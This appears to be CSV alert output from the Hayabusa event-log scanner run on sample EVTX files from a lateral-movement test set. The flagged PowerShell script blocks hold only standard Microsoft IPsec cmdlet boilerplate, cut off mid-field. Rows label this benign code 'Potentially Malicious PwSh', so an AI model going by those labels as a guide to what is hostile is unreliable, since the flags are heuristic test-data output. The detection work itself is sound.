Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) 